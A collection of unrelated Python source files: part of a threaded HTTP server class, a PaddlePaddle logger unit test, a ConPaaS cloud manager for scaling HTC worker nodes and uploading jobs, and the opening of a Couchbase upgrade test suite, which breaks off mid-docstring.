WebServer.CONF_DEFAULT_CONTENT_TYPE: 'text/html; charset=utf-8',
WebServer.CONF_CONNECTION_TIMEOUT: 3000,
WebServer.CONF_MAX_KEEP_ALIVE: 0,
WebServer.CONF_MAX_MESSAGE_SIZE: 65536,
WebServer.CONF_HIDE_EXCEPT_INFO: True
}
return conf
class WebServer(object):
""" Container for web applications. """
# configuration keys
CONF_SERVER_LISTEN = 'server.listen'
CONF_THREAD_POOL_SIZE = 'server.thread-pool-size'
CONF_SERVER_NAME = 'server.name'
CONF_DEFAULT_CONTENT_TYPE = 'server.default-content-type'
CONF_CONNECTION_TIMEOUT = 'server.connection-timeout'
CONF_MAX_KEEP_ALIVE = 'server.max-keep-alive'
CONF_MAX_MESSAGE_SIZE = 'server.max-message-size'
CONF_HIDE_EXCEPT_INFO = 'server.hide-except-info'
def __init__(self, logging, conf=None):
self.logging = logging
self.conf = conf if conf else WebServerConfiguration()
self._apps = []
self._acceptor = None
self._acceptor_guard = threading.Event()
def install(self, app, root=None):
""" Installs a web application.
:param app: Web application object.
:param root: Path that the application should be installed to.
"""
if root:
app.webapp.root = root if root.endswith('/') else root + '/'
self._apps.append((app.webapp.root, app))
self.logging.info('web application installed: ' + app.webapp.root)
def remove(self, root):
""" Removes a web application.
:param root: Root path of the application to be removed.
"""
if not root.endswith('/'):
root += '/'
for i in range(0, len(self._apps)):
if self._apps[i][0] == root:
self._apps.pop(i)
self.logging.info('web application removed: ' + root)
return True
return False
def run(self):
ap = self.conf[WebServer.CONF_SERVER_LISTEN].strip().split(':', 1)
address = (ap[0], int(ap[1]) if len(ap) == 2 else 80)
self.logging.info('launching web server %s:%d ...' % address)
try:
acceptor = socket.socket()
acceptor.bind(address)
acceptor.listen(4)
except Exception, e:
self.logging.error('ACCESS DENIED!!! web server can not start.')
self.logging.error(str(e))
return
self._acceptor = acceptor
self._acceptor_guard.set()
threads = []
for i in range(0, self.conf[WebServer.CONF_THREAD_POOL_SIZE]):
threads.append(threading.Thread(target=self._server_thread))
threads[i].start()
self.logging.info('---- web server is online now. ----')
for th in threads:
th.join()
def _map(self, context):
""" Find the app that is capable of handling the request.
:return: An (app, handler) tuple.
"""
req = context.request
host = req.headers.get('Host')
for path, app in self._apps:
if (app.webapp.host == '*' or app.webapp.host == host) and req.path.startswith(path):
return app, app.webapp.map(context)
return None, None
def _server_thread(self):
while True:
self._acceptor_guard.wait()
client, addr = self._acceptor.accept()
client.settimeout(self.conf[WebServer.CONF_CONNECTION_TIMEOUT])
self._acceptor_guard.set()
max_msg_size = self.conf[WebServer.CONF_MAX_MESSAGE_SIZE]
max_keep_alive = self.conf[WebServer.CONF_MAX_KEEP_ALIVE]
context = WebSessionContext(client)
while True:
try:
context.update(context.input.read_request(limit=max_msg_size))
context.keep_alive = max_keep_alive == 0 or max_keep_alive > context.request_count
req, res = context.request, context.response
app, handler = self._map(context)
if not handler:
self.logging.info('handler not found for: ' + req.startline)
context.response = HTTPNotFound()
else:
try:
queries = url_parse_queries(req.path)
handler.func(app, context, **queries)
except HTTPGenericError as e:
context.response = e
except Exception as e:
context.keep_alive = False
context.response = HTTPServerError()
stacktrace = traceback.format_exc().encode('utf-8', 'ignore')
self.logging.error(str(e))
self.logging.error(traceback.format_exc().encode('utf-8', 'ignore'))
if not self.conf[WebServer.CONF_HIDE_EXCEPT_INFO]:
context.response.data = stacktrace
context.response['Content-Type'] = 'text/plain; charset=utf-8'
if not context.do_not_reply:
self._reply(context)
self.logging.info('%d %s' % (context.response.status, req.startline))
except HTTPSizeTooLargeError as e:
context.output.write_response(HTTPBadRequest())
context.error = e
context.keep_alive = False
except Exception as e:
context.error = e
context.keep_alive = False
if not context.keep_alive:
try:
client.close()
except Exception, e:
self.logging.error('error close connection: ' + str(e))
break # end this session
if context.switch_protocol:
# The connection has been taken over by other protocols.
# It's other protocols' obligation to close the connection when the
# connection is no longer used.
self.logging.info('protocol switched %s:%d.' % (addr[0], addr[1]))
break
def _reply(self, context):
req, res = context.request, context.response
if context.do_not_modify:
context.output.write_response(res)
return
server = self.conf.get(WebServer.CONF_SERVER_NAME, '')
if server:
res['Server'] = server
if res.status == 200 and req.method in ['GET', 'HEAD', 'POST']:
res['Date'] = time.asctime() + ' ' + time.tzname[0]
if res.data:
res['Content-Length'] = len(res.data)
if 'Content-Type' not in res:
res['Content-Type'] = self.conf[WebServer.CONF_DEFAULT_CONTENT_TYPE]
else:
if req.method in ['GET', 'POST'] and 'Content-Length' not in res:
res['Content-Length'] = 0
if not context.keep_alive:
res['Connection'] = 'close'
context.output.write_response(res)
if __name__ == '__main__':
r = url_fetch('http://example.com/')
print(r)
|
logger_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from parl.utils import logger
import threading as th
class TestLogger(unittest.TestCase):
def test_set_level(self):
logger.set_level(logger.INFO)
logger.set_dir('./test_dir')
logger.debug('debug')
logger.info('info')
logger.warning('warn')
logger.error('error')
def test_thread_info(self):
def thread_func():
logger.info('test thread')
th_list = []
for i in range(10):
t = th.Thread(target=thread_func)
t.start()
th_list.append(t)
for t in th_list:
t.join()
if __name__ == '__main__':
unittest.main()
|
manager.py
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.htc.agent import client
from conpaas.services.htc.manager.worker import Worker
from conpaas.services.htc.manager.taskfarm import TaskFarm, UnknownHtcTypeError, UnimplementedHtcCombinationError
from conpaas.services.htc.manager.configuration import Configuration
import node_info
import os
import sys
import time
import pprint
pp = pprint.PrettyPrinter(indent=4,stream=sys.stderr)
#import json
#import random
class HTCManager(BaseManager):
"""Manager class with the following exposed methods:
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
RWCT = 'RemoteWallClockTime'
MT = 'MATCH_EXP_MachineCloudMachineType'
def __init__(self, config_parser, **kwargs):
"""Initialize a HTC Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('htc')
self.con = True
self.hub_ip = None
types = []
costs = []
limits = []
types.append(self.config_parser.get('iaas', 'INST_TYPE'))
cpt = self.config_parser.get('iaas', 'COST_PER_TIME')
i = cpt.index('/')
s = cpt.index('$')
c = cpt[s+2:i]
costs.append(float(c))
limits.append(int(self.config_parser.get('iaas', 'MAX_VMS')))
for cloud in self.controller.get_clouds():
types.append(self.config_parser.get(cloud.cloud_name, 'INST_TYPE'))
cpt = self.config_parser.get(cloud.cloud_name, 'COST_PER_TIME')
i = cpt.index('/')
s = cpt.index('$')
c = cpt[s+2:i]
costs.append(float(c))
limits.append(int(self.config_parser.get(cloud.cloud_name, 'MAX_VMS')))
self.configuration = Configuration(types,costs,limits)
self.logger.info(self.configuration.costs)
self.logger.info(self.configuration.keys)
self.logger.info(self.configuration.limits)
# random.seed()
# for t in types:
# self.configuration.set_average(t, 2 * random.uniform(0,1))
# self.configuration.relevant_time_unit(20)
# self.configuration.compute_throughput()
# self.configuration.dynamic_configuration()
self.pool={}
self.files=[]
@expose('POST')
def startup(self, kwargs):
self.logger.info("HTC Manager starting up")
self.logger.info(str(kwargs))
if self.state != self.S_INIT and self.state != self.S_STOPPED:
vals = { 'curstate': self.state, 'action': 'startup' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
if 'cloud' in kwargs:
try:
self._init_cloud(kwargs['cloud'])
except Exception:
return HttpErrorResponse(
"A cloud named '%s' could not be found" % kwargs['cloud'])
#self.logger.info('Get service TaskFarm')
try:
self.service = TaskFarm(kwargs['mode'], kwargs['type'])
except (UnknownHtcTypeError, UnimplementedHtcCombinationError) as e:
return HttpErrorResponse({ 'error': e.__str__() })
#self.logger.info('Got service TaskFarm, delete some kwargs entries')
self.state = self.S_PROLOGUE
del kwargs['type']
del kwargs['mode']
#del kwargs['m_type']
#self.logger.info('Show leftover kwargs entries')
self.logger.info(str(kwargs))
#self.logger.info('Starting Thread for startup')
Thread(target=self._do_startup, kwargs=kwargs).start()
self.logger.info(str(self.service))
return HttpJsonResponse({ 'state': self.state })
#def _do_startup(self, cloud, m_type):
def _do_startup(self, cloud):
"""Start up the service. The first node will be an agent running a
HTC Hub and a HTC Node."""
#self.logger.info("_do_startup(%s)" % cloud)
startCloud = self._init_cloud(cloud)
m_type = self.config_parser.get(startCloud.cloud_name, 'INST_TYPE') # 'default' may have been replaced by 'iaas'
#self.logger.info("_do_startup(%s)" % cloud)
self.logger.info(str(self.controller.get_clouds()))
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT, startCloud)
hub_node = nodes[0]
# The first agent is a HTC Hub and a HTC Node
client.create_hub(hub_node.ip, self.AGENT_PORT)
client.create_node(hub_node.ip, self.AGENT_PORT, hub_node.ip)
self.logger.info("Added node %s: %s " % (hub_node.id, hub_node.ip))
node_info.add_node_info('/etc/hosts', hub_node.ip, hub_node.id)
node = hub_node
worker = Worker(node.id, node.ip, node.private_ip, node.cloud_name, m_type)
self.service.add_worker(worker, int(node.id))
self.hub_ip = hub_node.ip
# Extend the nodes list with the newly created one
self.nodes += nodes
if m_type in self.pool:
self.pool[m_type]+=1
else:
self.pool[m_type]=1
self.state = self.S_RUNNING
except Exception, err:
self.logger.exception('_do_startup: Failed to create hub: %s' % err)
self.state = self.S_ERROR
@expose('POST')
def shutdown(self, kwargs):
"""Switch to EPILOGUE and call a thread to delete all nodes"""
# Shutdown only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'shutdown' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
self.state = self.S_EPILOGUE
Thread(target=self._do_shutdown, args=[]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_shutdown(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.logger.info(self.nodes)
self.nodes = []
self.logger.info("All nodes deleted")
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.add_context_replacement(dict(STRING='htc'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
#Thread(target=self._do_add_nodes, args=[count, kwargs['cloud'], kwargs['type']]).start()
Thread(target=self._do_add_nodes, args=[count, kwargs['cloud']]).start()
self.logger.info(str(kwargs))
return HttpJsonResponse({ 'state': self.state })
#TODO remove hack!!!
#def _do_add_nodes(self, count, cloud, m_type):
def _do_add_nodes(self, count, cloud):
"""Add 'count' HTC Nodes to this deployment"""
#if m_type in ['small', 'medium'] and cloud=='default':
# cloud = "cloud.amsterdam."+m_type
startCloud = self._init_cloud(cloud)
self.logger.info(str(self.controller.get_clouds()))
vals = { 'action': '_do_add_nodes', 'count': count }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT, startCloud)
# Startup agents
for node in node_instances:
self.logger.info("Adding node %s: " % (node.id))
client.create_node(node.ip, self.AGENT_PORT, self.hub_ip)
self.logger.info("Added node %s: %s " % (node.id, node.ip))
node_info.add_node_info('/etc/hosts', node.ip, node.id)
m_type = self.config_parser.get(cloud, 'INST_TYPE')
worker = Worker(node.id, node.ip, node.private_ip, node.cloud_name, m_type)
self.service.add_worker(worker, int(node.id))
self.logger.info(str(self.service))
self.nodes += node_instances
self.state = self.S_RUNNING
if m_type in self.pool:
self.pool[m_type]+=count
else:
self.pool[m_type]=count
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.logger.info(type(kwargs["id"]))
if kwargs["id"] not in self.service.registered_workers.keys():
return HttpErrorResponse("ERROR: This worker does not exist")
id=kwargs["id"]
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[id]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, worker_id):
"""Remove 'count' nodes, starting from the end of the list. This way
the HTC Hub gets removed last."""
self.logger.info(str(self.controller.get_clouds()))
node = self.service.get_worker(worker_id)
client.condor_off(node.ip, self.AGENT_PORT) # sign off with condor
self.logger.info("Removing node with IP %s" % node)
self.controller.delete_nodes([ node ])
node_info.remove_node_info('/etc/hosts', node.ip)
self.service.remove_worker(worker_id)
self.nodes.remove(node)
self.logger.info(str(self.service))
self.state = self.S_RUNNING
self.pool[node.type]-=1
@expose('UPLOAD')
def create_job(self, kwargs):
fileobject = kwargs.popitem()
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'create_job' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, fileobject[0])
# Write the uploaded script to filesystem
open(fullpath, 'w').write(fileobject[1].file.read())
key = self.service.add_bot(fullpath)
self.logger.debug("create_job with args=%s" % kwargs)
self.logger.info(str(self.service))
return HttpJsonResponse({ 'id': key })
@expose('UPLOAD')
def upload_file(self, kwargs):
fileobject = kwargs.popitem()
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'upload_file' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, fileobject[0])
# Write the uploaded script to filesystem
open(fullpath, 'w').write(fileobject[1].file.read())
self.files.append(fullpath)
self.logger.info(str(self.files))
@expose('UPLOAD')
def add(self, kwargs):
job_id = int(kwargs.pop('job_id'))
fileobject = kwargs.popitem()
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, fileobject[0])
# Write the uploaded script to filesystem
open(fullpath, 'w').write(fileobject[1].file.read())
key = self.service.add_on(fullpath, job_id)
self.logger.debug("add with args=%s" % kwargs)
self.logger.debug(type(key))
self.logger.info(str(self.service))
return HttpJsonResponse({ 'id': job_id })
@expose('POST')
def sample(self,kwargs):
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'sample' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
job_id = int(kwargs.pop('job_id'))
if not self.service.job_exists(job_id):
return HttpErrorResponse("wrong job_id: "+ str(job_id))
size = self.service.sample_job(job_id)
if size == -2:
return HttpErrorResponse("sampling already started for job_id: "+ str(job_id))
if size == -3:
return HttpErrorResponse("sampling already finished for job_id: "+ str(job_id))
self.logger.info(size)
Thread(target=self._do_check_jobs, args=[]).start()
return HttpJsonResponse({ 'out': "sampling started" })
@expose('POST')
def execute(self,kwargs):
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'execute' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
job_id = int(kwargs.pop('job_id'))
if not self.service.job_exists(job_id):
return HttpErrorResponse("wrong job_id: "+ str(job_id))
jb_key = "%d.0" % job_id
if self.service.tf_job_dict[jb_key]['SamplingStarted'] == False:
return HttpErrorResponse("Sampling not started for job id: "+ str(job_id))
if self.service.tf_job_dict[jb_key]['SamplingReady'] == False:
return HttpErrorResponse("Sampling not ready for job id: "+ str(job_id))
size = self.service.execute_job(job_id)
if size == -1:
return HttpErrorResponse("wrong job_id: "+ str(job_id))
return HttpJsonResponse({ 'out': "execution started, feel free to add more bags" })
@expose('POST')
def callback_time(self,kwargs):
task_id = kwargs.pop('task_id')
self.service.callback_time(task_id)
@expose('POST')
def get_config(self,kwargs):
# self.logger.info(self.configuration.conf_dict )
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'get_config' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
t = int(kwargs['t'])
if t not in self.configuration.conf_dict:
return HttpErrorResponse("manager not configured yet for throughput = "+ str(t))
return HttpJsonResponse({"conf":self.configuration.conf_dict[t]})
@expose('POST')
def get_m(self,kwargs):
# self.logger.info(self.configuration.m )
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'get_cost' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
t = int(kwargs['t'])
if t not in self.configuration.m:
return HttpErrorResponse("manager not configured yet for throughput = "+ str(t))
return HttpJsonResponse({"conf":self.configuration.m[t]})
@expose('POST')
def select(self,kwargs):
# self.logger.info(self.configuration.m )
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'select' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
t = int(kwargs['t'])
if t not in self.configuration.m:
return HttpErrorResponse("manager not configured yet for throughput = "+ str(t))
for k in self.pool:
while self.pool[k] > self.configuration.conf_dict[t][self.configuration.keys[k]]:
wid=self.service.get_worker_id(k)
self._do_remove_nodes(wid)
if self.pool[k] < self.configuration.conf_dict[t][self.configuration.keys[k]]:
count = self.configuration.conf_dict[t][self.configuration.keys[k]] - self.pool[k]
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count, 'cloud.amsterdam.'+ str(k)]).start()
self.logger.info(str(self.service))
return HttpJsonResponse({"conf:":self.configuration.m[t]})
def update_configuration(self, tasks_dict):
f1 = open('t1','a')
f2 = open('t2','a')
tot = {}
num = {}
for k in tasks_dict:
for t in tasks_dict[k]:
if t[self.MT] in tot:
tot[t[self.MT]] += t[self.RWCT]
num[t[self.MT]] += 1
else:
tot[t[self.MT]] = t[self.RWCT]
num[t[self.MT]] = 1
for k in tot:
print >>f1, k ,tot[k]/num[k]
self.logger.info(k +" "+str(tot[k]/num[k]))
av = self.configuration.averages[self.configuration.keys[k]]
no = self.configuration.notasks[self.configuration.keys[k]]
newtot = tot[k] + (no*av)
newno = num[k] + no
newav = 0
if av == 0:
newav = newtot/newno
else:
newav = 0.6*av + 0.4*tot[k]/num[k]
self.configuration.set_average(k,newav,newno)
print >>f2, k,newav
self.logger.info(k +" "+str(newav))
f1.close()
f2.close()
self.configuration.relevant_time_unit()
self.configuration.relevant_time_unit()
self.configuration.dynamic_configuration()
self.logger.info(self.configuration.averages)
def _do_check_jobs(self):
size=0
while True:
if len(self.service.tf_job_info)>size:
for k in self.service.tf_job_info:
if 'complete' not in self.service.tf_job_info[k]:
self.update_configuration(self.service.tf_job_info[k])
self.service.tf_job_info[k]['complete']=0
size = len(self.service.tf_job_info)
else:
time.sleep(2)
def __is_hub(self, node):
"""Return True if the given node is the HTC Hub"""
return node.ip == self.hub_ip
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
print str(self.service.registered_workers)
return HttpJsonResponse(self.service.s_registered_workers)
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
if self.state == self.S_RUNNING: # service is present
fn = "job_info@%d" % time.time()
fd = open(fn, "w")
pp = pprint.PrettyPrinter(indent=4,width=160,stream=fd)
pp.pprint(self.service.tf_job_info)
fd.close
self.service.tf_dict['file'] = fn
self.service.tf_dict['dir'] = os.getcwd()
self.logger.info(str(self.service))
return HttpJsonResponse({'state': self.state, 'type': 'htc', 'dict': self.service.tf_dict})
else:
return HttpJsonResponse({'state': self.state, 'type': 'htc'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'is_hub': self.__is_hub(serviceNode)
}
})
|
upgrade_tests.py
|
from .newupgradebasetest import NewUpgradeBaseTest
import queue
import copy
import threading
from random import randint
from remote.remote_util import RemoteMachineShellConnection
from couchbase_helper.tuq_helper import N1QLHelper
from pytests.eventing.eventing_helper import EventingHelper
from eventing.eventing_base import EventingBaseTest
from lib.testconstants import STANDARD_BUCKET_PORT
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from pytests.eventing.eventing_constants import HANDLER_CODE
from remote.remote_util import RemoteMachineShellConnection
from .newupgradebasetest import NewUpgradeBaseTest
from rebalance.rebalance_base import RebalanceBaseTest
from couchbase_helper.documentgenerator import BlobGenerator
class UpgradeTests(NewUpgradeBaseTest, EventingBaseTest):
def setUp(self):
super(UpgradeTests, self).setUp()
self.queue = queue.Queue()
self.graceful = self.input.param("graceful", False)
self.after_upgrade_nodes_in = self.input.param("after_upgrade_nodes_in", 1)
self.after_upgrade_nodes_out = self.input.param("after_upgrade_nodes_out", 1)
self.verify_vbucket_info = self.input.param("verify_vbucket_info", True)
self.initialize_events = self.input.param("initialize_events", "").split(":")
self.upgrade_services_in = self.input.param("upgrade_services_in", None)
self.after_upgrade_services_in = \
self.input.param("after_upgrade_services_in", None)
self.after_upgrade_services_out_dist = \
self.input.param("after_upgrade_services_out_dist", None)
self.in_between_events = self.input.param("in_between_events", "").split(":")
self.after_events = self.input.param("after_events", "").split(":")
self.before_events = self.input.param("before_events", "").split(":")
self.upgrade_type = self.input.param("upgrade_type", "online")
self.sherlock_upgrade = self.input.param("sherlock", False)
self.max_verify = self.input.param("max_verify", None)
self.verify_after_events = self.input.param("verify_after_events", True)
self.online_upgrade_type = self.input.param("online_upgrade_type", "swap")
self.offline_upgrade_type = self.input.param("offline_upgrade_type", "offline_shutdown")
self.src_bucket_name = self.input.param('src_bucket_name', 'src_bucket')
self.eventing_log_level = self.input.param('eventing_log_level', 'INFO')
self.dst_bucket_name = self.input.param('dst_bucket_name', 'dst_bucket')
self.dst_bucket_name1 = self.input.param('dst_bucket_name1', 'dst_bucket1')
self.metadata_bucket_name = self.input.param('metadata_bucket_name', 'metadata')
self.source_bucket_mutation_name = self.input.param('source_bucket_mutation_name', 'source_bucket_mutation')
self.dst_bucket_curl_name = self.input.param('dst_bucket_curl_name', 'dst_bucket_curl')
self.create_functions_buckets = self.input.param('create_functions_buckets', True)
self.use_memory_manager = self.input.param('use_memory_manager', True)
self.test_upgrade_with_xdcr = self.input.param('xdcr', False)
self.final_events = []
self.n1ql_helper = None
self.total_buckets = 1
self.in_servers_pool = self._convert_server_map(self.servers[:self.nodes_init])
""" Init nodes to not upgrade yet """
for key in list(self.in_servers_pool.keys()):
self.in_servers_pool[key].upgraded = False
self.out_servers_pool = self._convert_server_map(self.servers[self.nodes_init:])
self.gen_initial_create = BlobGenerator('upgrade', 'upgrade',
self.value_size,
end=self.num_items)
self.gen_create = BlobGenerator('upgrade', 'upgrade', self.value_size,
start=self.num_items + 1,
end=self.num_items * 1.5)
self.gen_update = BlobGenerator('upgrade', 'upgrade', self.value_size,
start=self.num_items // 2,
end=self.num_items)
self.gen_delete = BlobGenerator('upgrade', 'upgrade', self.value_size,
start=self.num_items // 4,
end=self.num_items // 2 - 1)
self.after_gen_create = BlobGenerator('upgrade', 'upgrade',
self.value_size,
start=self.num_items * 1.6,
end=self.num_items * 2)
self.after_gen_update = BlobGenerator('upgrade', 'upgrade',
self.value_size, start=1,
end=self.num_items/4)
self.after_gen_delete = BlobGenerator('upgrade', 'upgrade',
self.value_size,
start=self.num_items * .5,
end=self.num_items * 0.75)
initial_services_setting = self.input.param("initial-services-setting", None)
if initial_services_setting is not None and initial_services_setting.count("kv") < 2:
raise Exception("This test need at least 2 kv nodes to run")
""" Install original cb server """
self._install(self.servers[:self.nodes_init])
if not self.init_nodes and initial_services_setting is not None:
if "-" in initial_services_setting:
self.multi_nodes_services = True
initial_services = initial_services_setting.split("-")[0]
else:
initial_services = initial_services_setting
self.initialize_nodes([self.servers[:self.nodes_init][0]],
services=initial_services)
RestConnection(self.master).set_indexer_storage_mode()
self._log_start(self)
if len(self.servers[:self.nodes_init]) > 1:
if initial_services_setting is None:
self.cluster.rebalance(self.servers[:1],
self.servers[1:self.nodes_init],
[],
use_hostnames=self.use_hostnames)
else:
set_services = self.initial_services(initial_services_setting)
for i in range(1, len(set_services)):
self.cluster.rebalance([self.servers[0]],
[self.servers[i]],
[],
use_hostnames=self.use_hostnames,
services=[set_services[i]])
self.sleep(10)
else:
self.cluster.rebalance([self.servers[0]], self.servers[1:], [],
use_hostnames=self.use_hostnames)
self.sleep(5)
""" sometimes, when upgrade failed and node does not install couchbase
server yet, we could not set quota at beginning of the test. We
have to wait to install new couchbase server to set it properly here """
servers_available = copy.deepcopy(self.servers)
if len(self.servers) > int(self.nodes_init):
servers_available = servers_available[:self.nodes_init]
self.quota = self._initialize_nodes(
self.cluster, servers_available, self.disabled_consistent_view,
self.rebalanceIndexWaitingDisabled,
self.rebalanceIndexPausingDisabled, self.maxParallelIndexers,
self.maxParallelReplicaIndexers, self.port)
self.add_built_in_server_user(node=self.master)
self.bucket_size = self._get_bucket_size(self.quota, self.total_buckets)
self.create_buckets()
self.n1ql_server = None
self.success_run = True
self.failed_thread = None
self.generate_map_nodes_out_dist_upgrade(self.after_upgrade_services_out_dist)
if self.upgrade_services_in != "same":
self.upgrade_services_in = self.get_services(list(self.in_servers_pool.values()),
self.upgrade_services_in, start_node = 0)
self.after_upgrade_services_in = self.get_services(list(self.out_servers_pool.values()),
self.after_upgrade_services_in, start_node = 0)
self.fts_obj = None
self.index_name_prefix = None
if self.test_upgrade_with_xdcr:
from pytests.xdcr.xdcr_callable import XDCRCallable
# Setup XDCR src and target clusters
self.xdcr_handle = XDCRCallable(self.servers[:self.nodes_init])
def tearDown(self):
super(UpgradeTests, self).tearDown()
"""
This test_upgrade is written to upgrade from 5.x.x to 6.5.x
This test_upgrade function could run with many differnt test cases. All you need is params.
params:
**** Must include when run test_upgrade in job config or in conf file ****
upgrade_test=True (this param must include to run this test_upgrade)
skip_init_check_cbserver=true (this param will by pass check ns_server inside node)
*** these params could change its value ***
items=10000 (can any number)
initial_version=5.5.0-2958 (original cb version in cluster.
Must be in format x.x.x-xxxx )
released_upgrade_version=6.5.0-3265 (upgrade cluster to Mad-Hatter.
Must be in format x.x.x-xxxx )
nodes_init=3 (number of node cluster will form)
upgrade_type=offline (if this param not pass, default value is online.
If value is offline, default value of
offline_upgrade_type is normal offline upgrade)
offline_upgrade_type=offline_failover (this param is used with upgrade_type=offline
if do offline failover, it needs to pass
offline_upgrade_type=offline_failover)
initialize_events=event_before_upgrade (it must be separated with dash like
kv_ops_initialize-create_fts_index_query_compare.
Function called must be in underscore format)
initial-services-setting=kv,index-kv,n1ql,fts-kv,eventing,index,n1ql
Services for each node is separated with dash.
Remember, no space around comma
In example above, node 1 with services kv,index
node 2 with services kv,n1ql,fts
node 3 with services kv,eventing,index
init_nodes=False (default value is true and will get service from ini file, disable
initial-services-setting param above)
upgrade_services_in=same (if not pass this param, it will get services in ini file)
after_events=rebalance_in-run_fts_query_and_compare (event must separate with dash)
after_upgrade_services_in=kv,fts (this param will pass services to rebalance_in a
node above. If add 2 nodes in, it needs 2
services separated by dash. Otherwise, it will
get service from ini file)
Here is example of an offline failover upgrade test with fts
-t upgrade.upgrade_tests.UpgradeTests.test_upgrade,items=5000,initial_version=5.5.0-2958,
nodes_init=3,initialize_events=kv_ops_initialize-create_fts_index_query_compare,
initial-services-setting=kv,index-kv,n1ql,fts-kv,eventing,index,n1ql,
upgrade_services_in=same,after_events=rebalance_in-run_fts_query_and_compare,
after_upgrade_services_in=kv,fts,disable_HTP=True,upgrade_test=True,init_nodes=False,
skip_init_check_cbserver=true,released_upgrade_version=6.5.0-3265,dgm_run=true,
doc-per-day=1,upgrade_type=offline,offline_upgrade_type=offline_failover
"""
